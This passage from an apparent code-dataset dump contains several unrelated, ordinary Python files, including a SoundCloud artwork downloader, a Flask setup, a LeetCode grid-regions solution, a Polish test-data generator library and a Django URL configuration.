prematurely any and all download progress will be lost.\n\"\"\")\n# tracker variables\ntotal_songs = 0\ntotal_query_urls = 0\ntotal_song_urls = 0\ntotal_artwork_urls = 0\ntotal_downloaded_artwork = 0\n\n# Process (5-steps)\n# (1) Prompt user for folder path\nfolder_path = input(\"\\nEnter a folder path: \")\n\n# (2) Get song filenames\nsong_list = []\nsong_list = get_mp3_filenames(folder_path)\nprint(\"(\" + str(total_songs) + \") \" + \"Songs discovered in [\"+folder_path+\"].\")\ndownload_folder_path = input(\"Enter download location: \")\n#print_results(song_list)\n\n# (3) Create SoundCloud query urls\ntime.sleep(0.1)\nprint(\"\\nCreating SoundCloud urls...\")\n_query_urls = create_query_urls(song_list)\nprint(\"(\"+str(total_query_urls)+\"/\"+str(total_songs)+\") \"+\"SoundCloud query urls successfully created.\\n\")\n\n# (4) Get SoundCloud song urls\ntime.sleep(0.1)\n_song_urls = get_first_result(_query_urls)\nprint(\"(\"+str(total_song_urls)+\"/\"+str(total_songs)+\") \"+\"Song urls successfully scraped from SoundCloud.\\n\")\n#print_results(scraped_urls)\n\n# (5) Get artwork urls\ntime.sleep(0.1)\n_artwork_urls = get_artwork_urls(_song_urls)\n#print_results(_artwork_urls)\nprint(\"(\"+str(total_artwork_urls)+\"/\"+str(total_songs)+\") \"+\"Artwork urls successfully scraped from SoundCloud.\\n\")\n\n# (6) Download artwork\ntime.sleep(0.1)\nreplace_with_ampersand(song_list)\ndownload_artwork(_artwork_urls, download_folder_path, song_list)\nprint(\"(\"+str(total_downloaded_artwork)+\"/\"+str(total_songs)+\") \"+\"Artwork successfully downloaded from SoundCloud to [\"+download_folder_path+\"].\")\ninput(\"Press enter to continue...\")","sub_path":"ArtworkDownloader.py","file_name":"ArtworkDownloader.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"153873120","text":"import os\nimport csv\n\n\n#MAKING FOLDERS FROM DICTIONARY\ndef writecsv(movs):\n\tcurdir = os.getcwd()\n\n\tif not os.path.isdir(os.path.join(curdir, \"Movies\")):\n\t\tos.mkdir(\"Movies\")\n\n\tmoviedir = os.path.join(curdir, \"Movies\")\n\tos.chdir(moviedir)\n\n\tfor i in movs:\n\t\tif not os.path.isdir(os.path.join(os.getcwd(), i)):\n\t\t\tos.mkdir(i)\n\t\tdatedir = os.path.join(os.getcwd(), i)\n\t\tos.chdir(datedir)\n\n\t\tfor j in movs[i]:\n\t\t\tif not os.path.isdir(os.path.join(os.getcwd(), j)):\n\t\t\t\tos.mkdir(j)\n\n\t\t\ttimedir = os.path.join(os.getcwd(), j)\n\t\t\tos.chdir(timedir)\n\n\t\t\tfor k in movs[i][j]:\n\t\t\t\tif not os.path.isdir(os.path.join(os.getcwd(), k)):\n\t\t\t\t\tos.mkdir(k)\n\t\t\t\tseatsdir = os.path.join(os.getcwd(), k)\n\t\t\t\tos.chdir(seatsdir)\n\n\t\t\t\tif movs[i][j][k]:\n\t\t\t\t\twith open(\"seats.csv\", 'w') as seatmap:\n\t\t\t\t\t\twritingob = csv.writer(seatmap)\n\t\t\t\t\t\tfor n in movs[i][j][k]:\n\t\t\t\t\t\t\twritingob.writerow([n])\n\n\t\t\t\tif(os.path.exists('seats.csv') and (len(movs[i][j][k])==0)):\n\t\t\t\t\tos.remove('seats.csv')\n\n\t\t\t\tos.chdir(timedir)\n\n\t\t\tos.chdir(datedir)\n\n\t\tos.chdir(moviedir)\n\n\tos.chdir(curdir)\n\n\n\n\n#MAKING DICTIONARY OUT OF DIRECTORIES\n\n#IF YOU ADD MOVIES BY SLOT THEN IT WILL SURELY MAKE DICTIONARY\ndef readcsv():\n\tmovs = dict()\n\n\tcurdir = os.getcwd()\n\n\tmoviedir = os.path.join(curdir, \"Movies\")\n\tos.chdir(moviedir)\n\n\tmovies = os.listdir(os.getcwd())\n\n\tfor i in movies:\n\t\tmovs[i] = dict()\n\n\t\tdatedir = os.path.join(os.getcwd(), i)\n\t\tos.chdir(datedir)\n\n\t\tdates = os.listdir(os.getcwd())\n\t\tfor j in dates:\n\t\t\tmovs[i][j] = dict()\n\n\t\t\ttimedir = os.path.join(os.getcwd(), j)\n\t\t\tos.chdir(timedir)\n\n\t\t\ttimes = os.listdir(os.getcwd())\n\t\t\tfor k in times:\n\t\t\t\tmovs[i][j][k] = []\n\n\t\t\t\tseatdir = os.path.join(os.getcwd(), k)\n\t\t\t\tos.chdir(seatdir)\n\n\t\t\t\tif(os.path.exists(\"seats.csv\")):\n\t\t\t\t\twith open(\"seats.csv\", \"r\") as readfile:\n\t\t\t\t\t\tfile_reader = csv.reader(readfile)\n\n\t\t\t\t\t\tfor line in file_reader:\n\t\t\t\t\t\t\tmovs[i][j][k].extend(line)\n\t\t\t\tos.chdir(timedir)\n\n\t\t\tos.chdir(datedir)\n\n\t\tos.chdir(moviedir)\n\n\tos.chdir(curdir)\n\n\treturn movs\n","sub_path":"dir.py","file_name":"dir.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"169053335","text":"from flask import Flask\nfrom models import db\nfrom config import DATABASE_CONNECTION_URI\n\ndef create_app():\n flask_app = Flask(__name__) # creating flask app\n flask_app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_CONNECTION_URI\n # assigning URI to this app, which is used to connect to postgres db\n flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n # needs to be set to True of False, else error. True will track modifications & take up more memory \n flask_app.app_context().push() # since Flask can have multiple apps we have to specify which app we are using with SQLAlchemy, hence we push the context with our newly created app. \n # adding context to future calls made with this app (line 11) flask.current_app=the application handling the current request\n db.init_app(flask_app) # linking db to flask app\n# db.drop_all() # deletes all databases so we start with an empty database\n db.create_all() # creating table(s) in database, using models.py\n return flask_app # adding context to future calls made with this app (line 11) flask.current_app=the application handling the current request\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"74965513","text":"import cmd_view\nfrom validate import Check\nimport graph\nimport pickle\nfrom pickle_view import testing_pickle\nimport sys\nimport datetime\nfrom entered_file_view import EnteredFile\nfrom database_view import Database\nfrom display_methods import Display as Dm\n\n\nclass Controller:\n def __init__(self, view):\n self.__entered_file = EnteredFile()\n self.__validated_data = []\n self.__check_input = Check()\n self.__stored_data = \"Data not stored\"\n self.__db = Database()\n self.__cmd_view = view\n self.__loaded_input = \"Data not loaded\"\n\n def go(self, controller):\n self.__cmd_view.set_controller(controller)\n self.__cmd_view.cmdloop()\n\n def database(self, line):\n self.__db.create_database()\n self.__loaded_input = self.__db.get_posts()\n print(\"Your data has been added to the database\")\n\n def load(self, location):\n try:\n directory = location\n self.__entered_file.get_input(directory)\n self.__loaded_input = []\n self.__loaded_input = self.__entered_file.get_data()\n print(\"Loaded from file\")\n except FileNotFoundError:\n print(\"Please select valid file location!\")\n\n def validate(self, line):\n if self.__loaded_input != \"Data not loaded\":\n self.__validated_data =\\\n self.__check_input.check_data(self.__loaded_input)\n print(\"Entry data is checked\")\n else:\n print(\"Please load data before validating\")\n\n def save(self, line):\n if len(line) == 0:\n if self.__loaded_input == \"Data not loaded\":\n print(\"\\nData needs to be loaded before saving\")\n if not self.__validated_data:\n print(\"No data has been validated.\\nPlease \"\n \"validate data before saving\")\n elif self.__validated_data[0]:\n self.__stored_data = []\n print(\"The following data has been saved\")\n for row in range(1, len(self.__validated_data)):\n self.__stored_data.append(self.__validated_data[row])\n else:\n print(\"Please do not enter any extra input after 'save'\")\n\n def display(self, format):\n display_type = Dm.get_display_type(format)\n calculator = Dm.builder(\n display_type, self.__loaded_input, self.__stored_data)\n return calculator.calculate_displaying()\n\n def graph(self, line):\n if not isinstance(self.__stored_data, str):\n graph.do_display_graph(self.__stored_data)\n\n def pickle(self, user_input):\n user_input = user_input.split(\" \")\n if user_input[0] == 'save':\n if self.__stored_data != \"Data not stored\":\n if user_input[1]:\n testing_pickle(self.__stored_data, user_input[1])\n else:\n print(\"No data loaded and validated\")\n elif user_input[0] == 'load':\n with open(user_input[1] + '.pickle', 'rb') as file:\n self.__loaded_input = pickle.load(file)\n print(\"The pickle content follows\")\n for row in range(len(self.__loaded_input)):\n print(self.__loaded_input[row])\n else:\n print(\"please enter and type of pickle (load or save) \"\n \"and the location or name\")\n\n @staticmethod\n def opening(line):\n time_now = datetime.date.today()\n if len(sys.argv) > 1:\n sys.argv[1] = line\n if sys.argv[1] == \"welcome\":\n print(\"Hello and this is Josh's program and it is \" +\n str(time_now))\n else:\n print(\"The time is \" + str(time_now) +\n \". Argument not accepted\")\n\nif __name__ == \"__main__\":\n control = Controller(cmd_view.CmdView())\n Controller.opening(\"\")\n control.go(control)\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179952073","text":"\"\"\"\n959. Regions Cut By Slashes\nIn a N x N grid composed of 1 x 1 squares, each 1 x 1 square consists of a /, \\, or blank space. These characters divide the square into contiguous regions.\n\n(Note that backslash characters are escaped, so a \\ is represented as \"\\\\\".)\n\nReturn the number of regions.\n\n \n\nExample 1:\n\nInput:\n[\n \" /\",\n \"/ \"\n]\nOutput: 2\n\"\"\"\n# this is a problem to find number of connected components\n# either use union find or dfs\n# dfs\n# very annoying to analyze all possible outcomes\n# time complexity -- O(N*M)\n# Runtime: 156 ms, faster than 88.22% of Python3 online submissions for Regions Cut By Slashes.\n# Memory Usage: 13.3 MB, less than 100.00% of Python3 online submissions for Regions Cut By Slashes.\nclass Solution:\n def regionsBySlashes(self, grid: List[str]) -> int:\n n_row, n_col = len(grid), len(grid[0])\n node = {(0, 1):False, (0, -1): False, (1, 0):False, (-1, 0):False}\n self.graph = [[node.copy() for _ in range(n_col)] for _ in range(n_row)]\n self.direct_loc = {(0, 1):(-1, 0), (1, 0):(0, 1), \n (-1, 0):(0, -1), (0, -1):(1, 0)}\n num_area = 0\n for i in range(n_row):\n for j in range(n_col):\n for key in self.graph[i][j].keys():\n if self.graph[i][j][key]:\n continue \n # print(i, j, key)\n self.dfs(i, j, key, grid)\n num_area += 1\n return num_area\n \n def dfs(self, x, y, loc, grid):\n n_row, n_col = len(grid), len(grid[0])\n if self.graph[x][y][loc]:\n return \n \n self.graph[x][y][loc] = True\n if grid[x][y] == \"/\":\n if loc == (-1, 0):\n self.graph[x][y][(0, 1)] = True\n new_directions = [[-1, 0], [0, -1]]\n elif loc == (0, 1):\n self.graph[x][y][(-1, 0)] = True\n new_directions = [[-1, 0], [0, -1]]\n elif loc == (1, 0):\n self.graph[x][y][(0, -1)] = True\n new_directions = [[1, 0], [0, 1]]\n elif loc == (0, -1):\n self.graph[x][y][(1, 0)] = True\n new_directions = [[1, 0], [0, 1]]\n elif grid[x][y] == \"\\\\\":\n if loc == (-1, 0):\n self.graph[x][y][(0, -1)] = True\n new_directions = [[0, -1], [1, 0]]\n elif loc == (0, -1):\n self.graph[x][y][(-1, 0)] = True\n new_directions = [[0, -1], [1, 0]]\n elif loc == (1, 0):\n self.graph[x][y][(0, 1)] = True\n new_directions = [[0, 1], [-1, 0]]\n elif loc == (0, 1):\n self.graph[x][y][(1, 0)] = True\n new_directions = [[0, 1], [-1, 0]]\n elif grid[x][y] == \" \":\n for key in self.graph[x][y].keys():\n self.graph[x][y][key] = True\n new_directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n \n for dx, dy in new_directions:\n new_x, new_y = x + dx, y + dy\n if new_x < 0 or new_x >= n_row or new_y < 0 or new_y >= n_col:\n continue\n new_loc = self.direct_loc[(dx, dy)]\n self.dfs(new_x, new_y, new_loc, grid)\n ","sub_path":"Widen/LC959_Regions_Cut_By_Slashes.py","file_name":"LC959_Regions_Cut_By_Slashes.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"366257324","text":"\"\"\" Podstawowe funkcje do generatorów. Ułatwiają generowanie danych do wielu zbiorów jednocześnie, wraz z zależnościami między nimi.\nGeneratory tworzone przy pomocy poniższych funkcji powinny bazować na wykorzystaniu list. Każdą kolumnę tworzy się\npoprzez stworzenie oddzielnej listy, zależności między kolumnami tworzy się, gederując dane do nowej kolumny iterując\npo kolumnie już istniejącej. Kolumny można również importować z plików CSV, tworząc z nich maciecierz, a następnie pobierać z macierzy\n wybrane kolumny. Po skompletowaniu wszystkich kolumn, trzeba połączyć kolumny w zbiory przy pomocy funkcji list(zip(kolumny*)), a\n następnie powstałe macierze wyeksportować przy pomocy odpowiedniej funkcji do pliku CSV\"\"\"\n\ndef z_pliku_do_macierzy(nazwa_pliku):\n \"\"\" funkcja pobiera wiersze z wybranego pliku csv, i zamienia je w krotki, które są elementami listy wyjściowej (macierzy)\n wszystkie elementy macierzy są stringami\"\"\"\n print(\"Wczytywanie pliku %s.csv...\" % nazwa_pliku)\n plik = open(\"%s.csv\" % nazwa_pliku,\"r\")\n macierz = []\n for linia in plik:\n lista = linia.replace(\"\\n\",\"\").split(\";\")\n krotka = tuple(lista)\n macierz.append(krotka)\n plik.close()\n return macierz\n del macierz\n del lista\n del krotka\n\ndef kolumna_z_macierzy(macierz, nazwa_kolumny):\n \"\"\"Funkcja pobiera z danej macierzy kolumnę o podanej nazwie. Pierwszym parametrem jest zmienna z macierzą,\n drugim - string z dokładną nazwą kolumny. Powstała lista (kolumna) nie zawiera nagłówka\"\"\"\n nagłówki = macierz[0]\n for nazwa in nagłówki:\n if nazwa == nazwa_kolumny:\n indeks_kolumny = nagłówki.index(str(nazwa))\n print(\"Ekstrakcja kolumny %s...\" % nazwa_kolumny)\n break\n else:\n pass\n else:\n print(\"Nie ma takiej kolumny\")\n nagłówki = 1\n kolumna = []\n for krotka in macierz:\n if krotka[indeks_kolumny].isdigit():\n x = int(krotka[indeks_kolumny])\n else:\n x = krotka[indeks_kolumny]\n if nagłówki == 1:\n nagłówki += 1\n else:\n kolumna.append(x)\n return kolumna\n del nagłówki\n del kolumna\n del x\n\n\ndef kolumna_z_macierzy_bez_nazwy(macierz, indeks_kolumny):\n \"\"\" Funkcja umożliwia pobieranie kolumn z macierzy bez nagłówków. Pierwszym parametrem jest zmienna z macierzą,\n drugim indeks kolumny (czyli indeks elementów krotek, reprezentujących wiersze macierzy)\"\"\"\n kolumna = []\n for krotka in macierz:\n if krotka[indeks_kolumny].isdigit():\n x = int(krotka[indeks_kolumny])\n else:\n x = krotka[indeks_kolumny]\n kolumna.append(x)\n return kolumna\n del kolumna\n\n\n\ndef z_macierzy_do_pliku_z_nagłówkami(macierz,nazwa_pliku, *nazwy_kolumn):\n \"\"\" Zapisuje wskazaną macierz w pliku o wybranej nazwie i z wybranymi nazwami kolum. Nazwy pliku i kolumn muszą być\n stringami\"\"\"\n print(\"Zapisywanie do pliku %s.csv...\" % nazwa_pliku )\n d = open(\"%s.csv\" % nazwa_pliku, \"w\")\n d.write(\";\".join(nazwy_kolumn))\n d.write(\"\\n\")\n for krotka in macierz:\n lista = []\n for element in krotka:\n lista.append(str(element))\n d.write(\";\".join(lista))\n d.write(\"\\n\")\n d.close()\n\n\ndef z_macierzy_do_pliku(macierz,nazwa_pliku):\n \"\"\"funkcja zapisuje do pliku csv macierz, dzieląc kolumny średnikami. Powstały plik nie zawiera nagłówków\"\"\"\n print(\"Zapisywanie do pliku %s.csv...\" % nazwa_pliku)\n d = open(\"%s.csv\" % nazwa_pliku, \"w\")\n for krotka in macierz:\n lista = []\n for element in krotka:\n lista.append(str(element))\n d.write(\";\".join(lista))\n d.write(\"\\n\")\n d.close()\n del lista\n\n#li to lista, funkcja tworzy na jej podstawie nową listę, ale bez powtarzających się elementów.\n\n\ndef distinct(li):\n \"\"\"Funkcja na podstawie podanej listy tworzy listę bez powtarzających się elementów\"\"\"\n li2 = []\n for i in li:\n if i not in li2:\n li2.append(i)\n return li2\n del li2\n\n\n\ndef losowanie_z_listy(lista_wejściowa, długość):\n \"\"\"funkcja zwraca listę określonej długości z losowymi elementami z listy wejściowej\"\"\"\n from random import randint\n lista_2 = []\n for i in range(długość):\n a = lista_wejściowa[randint(0,len(lista_wejściowa)-1)]\n lista_2.append(a)\n return lista_2\n del lista_2\n\n#funkcja na podstawie listy wartości niestandaryzowanych\ndef standaryzacja_0_1(lista_do_standaryzacj):\n \"\"\"Funkcja standaryzuje elementy listy, zwracając listę z liczbami z przedziału od 0-1\"\"\"\n lista_zestandaryzowana = []\n for x in lista_do_standaryzacj:\n y = (x - min(lista_do_standaryzacj))/(max(lista_do_standaryzacj) - min(lista_do_standaryzacj))\n lista_zestandaryzowana.append(y)\n return lista_zestandaryzowana\n del lista_zestandaryzowana\n\n\ndef standaryzacja_min_1(lista_do_standaryzacj):\n \"\"\"Funkcja tworzy listę zestandaryzowaną, w której największemu elementowi odpowiada 1, a najmniejszemu jego wartość\n podzielona przez wartość elementu maksymalnego\"\"\"\n lista_zestandaryzowana = []\n for x in lista_do_standaryzacj:\n y = (x)/(max(lista_do_standaryzacj))\n lista_zestandaryzowana.append(y)\n return lista_zestandaryzowana\n\n# standaryzacja pozwalająca na losowanie przy pomocy p = random.random(). metoda = if p < waga_następnego_obiektu\ndef standaryzacja_do_losowania(lista_do_standaryzacj):\n \"\"\" Lista tworzy dystrybuantę z wartości listy. Przydatna przy tworzeniu wag elementów na podstawie pewnych, związanych\n z nimi wartości, i pozwala na losowanie z zastosowaniem wag przy pomocy funkcji random(). Metoda:\n if random() <= pierwszy argument dystrybuanty\n elif random() <= drugi argument dystrybuanty\n ...\"\"\"\n lista_zestandaryzowana = []\n print(lista_do_standaryzacj)\n poprzedni_y = 0\n for x in lista_do_standaryzacj:\n y = (x)/(sum(lista_do_standaryzacj))\n y = y + poprzedni_y\n lista_zestandaryzowana.append(y)\n poprzedni_y = y\n return lista_zestandaryzowana\n\n\n\n\ndef generator_imion_nazwisk(odsetek_mężczyzn_float, ilość, unikalność_kombinacji_T_N = \"N\"):\n \"\"\"generator zwraca unikalne kombinacje imiona i nazwiska obu płci,\n w zależności od ustalonego odsetka płci, w ustalonej ilości, z opcją zachowania unikalności kombinacji.\n wymaga plików csv Imiona męskie, Imiona żeńskie, Nazwiska męskie, Nazwiska żeńskie (trzeba podać ścieżki)\"\"\"\n\n from random import random\n from random import randint\n from Moje_biblioteki import Gen\n macierz = []\n M_imiona_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Imiona męskie\")\n M_nazwiska_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Nazwiska męskie\")\n Imię_męskie = Gen.kolumna_z_macierzy(M_imiona_męskie, \"Imię\")\n Nazwisko_męskie = Gen.kolumna_z_macierzy(M_nazwiska_męskie, \"Nazwisko\")\n\n M_imiona_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Imiona żeńskie\")\n M_nazwiska_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Nazwiska żeńskie\")\n Imię_żeńskie = Gen.kolumna_z_macierzy(M_imiona_żeńskie, \"Imię\")\n Nazwisko_żeńskie = Gen.kolumna_z_macierzy(M_nazwiska_żeńskie, \"Nazwisko\")\n macierz_unikalnych_rekordów = []\n if unikalność_kombinacji_T_N == \"T\":\n while len(macierz_unikalnych_rekordów) < ilość:\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n macierz_unikalnych_rekordów = Gen.distinct(macierz)\n return macierz_unikalnych_rekordów\n elif unikalność_kombinacji_T_N == \"N\":\n for i in range(ilość):\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n return macierz\n else:\n print(\"Wpisz 'T' lub 'N' w pozycji 'unikalność kombinacji\")\n print(\"Nie wygenerowano imion\")\n del macierz\n del M_imiona_męskie\n del M_nazwiska_męskie\n del M_imiona_żeńskie\n del M_nazwiska_żeńskie\n del Imię_męskie\n del Imię_żeńskie\n del Nazwisko_żeńskie\n del Nazwisko_męskie\n del macierz_unikalnych_rekordów\n\n\ndef generator_imion_nazwisk_amerykanskich(odsetek_mężczyzn_float, ilość, unikalność_kombinacji_T_N = \"N\"):\n \"\"\"generator zwraca unikalne kombinacje imiona i nazwiska obu płci,\n w zależności od ustalonego odsetka płci, w ustalonej ilości, z opcją zachowania unikalności kombinacji.\n wymaga plików csv Imiona męskie, Imiona żeńskie, Nazwiska męskie, Nazwiska żeńskie (trzeba podać ścieżki)\"\"\"\n\n from random import random\n from random import randint\n from Moje_biblioteki import Gen\n macierz = []\n M_imiona_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie imiona meskie\")\n M_nazwiska_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie nazwiska meskie\")\n Imię_męskie = Gen.kolumna_z_macierzy(M_imiona_męskie, \"GivenName\")\n Nazwisko_męskie = Gen.kolumna_z_macierzy(M_nazwiska_męskie, \"Surname\")\n\n M_imiona_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie imiona zenskie\")\n M_nazwiska_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie nazwiska zenskie\")\n Imię_żeńskie = Gen.kolumna_z_macierzy(M_imiona_żeńskie, \"GivenName\")\n Nazwisko_żeńskie = Gen.kolumna_z_macierzy(M_nazwiska_żeńskie, \"Surname\")\n macierz_unikalnych_rekordów = []\n if unikalność_kombinacji_T_N == \"T\":\n while len(macierz_unikalnych_rekordów) < ilość:\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n macierz_unikalnych_rekordów = Gen.distinct(macierz)\n return macierz_unikalnych_rekordów\n elif unikalność_kombinacji_T_N == \"N\":\n for i in range(ilość):\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n return macierz\n else:\n print(\"Wpisz 'T' lub 'N' w pozycji 'unikalność kombinacji\")\n print(\"Nie wygenerowano imion\")\n del macierz\n del M_imiona_męskie\n del M_nazwiska_męskie\n del M_imiona_żeńskie\n del M_nazwiska_żeńskie\n del Imię_męskie\n del Imię_żeńskie\n del Nazwisko_żeńskie\n del Nazwisko_męskie\n del macierz_unikalnych_rekordów\n\n\n\ndef generator_id(ilość):\n \"\"\"generator danej ilości id, zwraca listę\"\"\"\n lista = []\n x = 1\n for i in range(ilość):\n lista.append(x)\n x += 1\n return lista\n del lista\n\ndef losowe_daty_w_przedziale(data_początkowa_str,data_końcowa_str,ilość):\n \"\"\"funkcja zwraca zadaną ilość losowych dat z danego przedziału w liście. w formacie \"%d-%m-%Y\"\"\"\n import datetime\n import time\n from random import random\n data1 = datetime.datetime.strptime(data_początkowa_str,\"%d-%m-%Y\")\n data2 = datetime.datetime.strptime(data_końcowa_str,\"%d-%m-%Y\")\n data3 = data2 - data1\n lista_dat = []\n for i in range(ilość):\n data4 = data3 * random()\n data5 = datetime.datetime.strftime(data4 + data1, \"%d-%m-%Y\")\n lista_dat.append(data5)\n return lista_dat\n del lista_dat\n\ndef poj_losowa_data_z_przedziału(data_początkowa_str,data_końcowa_str):\n \"\"\"generuje pojedynczą datę z przedziału\"\"\"\n import datetime\n import time\n from random import random\n data1 = datetime.datetime.strptime(data_początkowa_str,\"%d-%m-%Y\")\n data2 = datetime.datetime.strptime(data_końcowa_str,\"%d-%m-%Y\")\n data3 = data2 - data1\n data4 = data3 * random()\n data5 = datetime.datetime.strftime(data4 + data1, \"%d-%m-%Y\")\n return data5\n\ndef zmiana_dat_z_listy(lista, days,weeks ):\n \"\"\"funkcja zmienia daty z podanej listy o podaną ilość dni i tygodni i zwraca w liście\"\"\"\n import datetime\n lista_dat = []\n for data in lista:\n data1 = datetime.datetime.strptime(data,\"%d-%m-%Y\")\n data2 = data1 + datetime.timedelta(days, 0, 0, 0, 0, 0, weeks)\n data3 = datetime.datetime.strftime(data2, \"%d-%m-%Y\")\n lista_dat.append(data3)\n return lista_dat\n del lista_dat\n\ndef zmiana_pojedynczej_daty(data, days, weeks):\n import datetime\n data1 = datetime.datetime.strptime(data,\"%d-%m-%Y\")\n data2 = data1 + datetime.timedelta(days, 0, 0, 0, 0, 0, weeks)\n data3 = datetime.datetime.strftime(data2, \"%d-%m-%Y\")\n return data3\n\ndef elementy_list_w_stringi(lista):\n \"\"\"zmienia wszystkie elementy listy w stringi\"\"\"\n lista_ze_str = []\n for i in lista:\n lista_ze_str.append(str(i))\n return lista_ze_str\n del lista_ze_str\n\ndef dodaj_kolumnę_do_macierzy(macierz, kolumna, macierz_z_nagłówkami_T_N = \"N\", nazwa_kolumny = \"Nowa Kolumna\"):\n \"\"\"Funkcja dodaje nową kolumnę do istniejącej macierzy\"\"\"\n macierz_wyjściowa = []\n print(\"Dodawanie kolumny %s...\" % nazwa_kolumny)\n if macierz_z_nagłówkami_T_N == \"T\":\n nagłówek = list(macierz[0])\n nagłówek.append(nazwa_kolumny)\n nagłówek = tuple(nagłówek)\n macierz_wyjściowa.append(nagłówek)\n for index in range(1, len(macierz)):\n wiersz = list(macierz[index])\n wiersz.append(kolumna[index - 1])\n wiersz = tuple(wiersz)\n macierz_wyjściowa.append(wiersz)\n else:\n for index in range(0, len(macierz)):\n wiersz = list(macierz[index])\n wiersz.append(kolumna[index])\n wiersz = tuple(wiersz)\n macierz_wyjściowa.append(wiersz)\n return macierz_wyjściowa\n\ndef sprawdzanie_liczności_kolumn(nazwa_zbioru, *kolumny):\n \"\"\"Funkcja sprawdza liczność wybranych kolumn. Dla orientacji można nazwać kolumny\"\"\"\n print(\"%s:\" % nazwa_zbioru)\n lista_kolumn = kolumny\n x=1\n for i in lista_kolumn:\n print(\"kolumna%s:\" % x, len(i))\n x +=1\n print(\"\\n\")\n\ndef losowa_godzina_w_przedziale(godzina_min, godzina_max):\n from random import randint\n h = randint(godzina_min, godzina_max)\n if h < 10:\n h = \"0%s\" % h\n else:\n h = str(h)\n m = randint(1, 59)\n if m < 10:\n m = \"0%s\" % m\n else:\n m = str(m)\n s = randint(1,59)\n if s < 10:\n s = \"0%s\" % s\n else:\n s = str(s)\n godzina = \"%s:%s:%s\" %(h,m,s)\n return godzina","sub_path":"Gen.py","file_name":"Gen.py","file_ext":"py","file_size_in_byte":16523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"341070141","text":"from django.contrib import admin\nfrom django.urls import include, path\n\nfrom .views import home\nadmin.autodiscover()\n\nurlpatterns = [\n path('', home, name='home'),\n\n # url(r'^demoproject/', include('demoproject.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n path('admin_tools_stats/', include('admin_tools_stats.urls')),\n path('admin_tools/', include('admin_tools.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"demoproject/demoproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"212559501","text":"\"Module containing some useful EdmObjects for building dls screens\"\n\nfrom edmObject import *\n__all__=['arrow', 'dummy', 'embed', 'exit_button', 'label',\\\n 'raised_PV_button_circle', 'raised_PV_circle', \\\n 'raised_button_circle', 'raised_circle', 'raised_text_button_circle',\\\n 'raised_text_circle', 'rd', 'rd_visible', 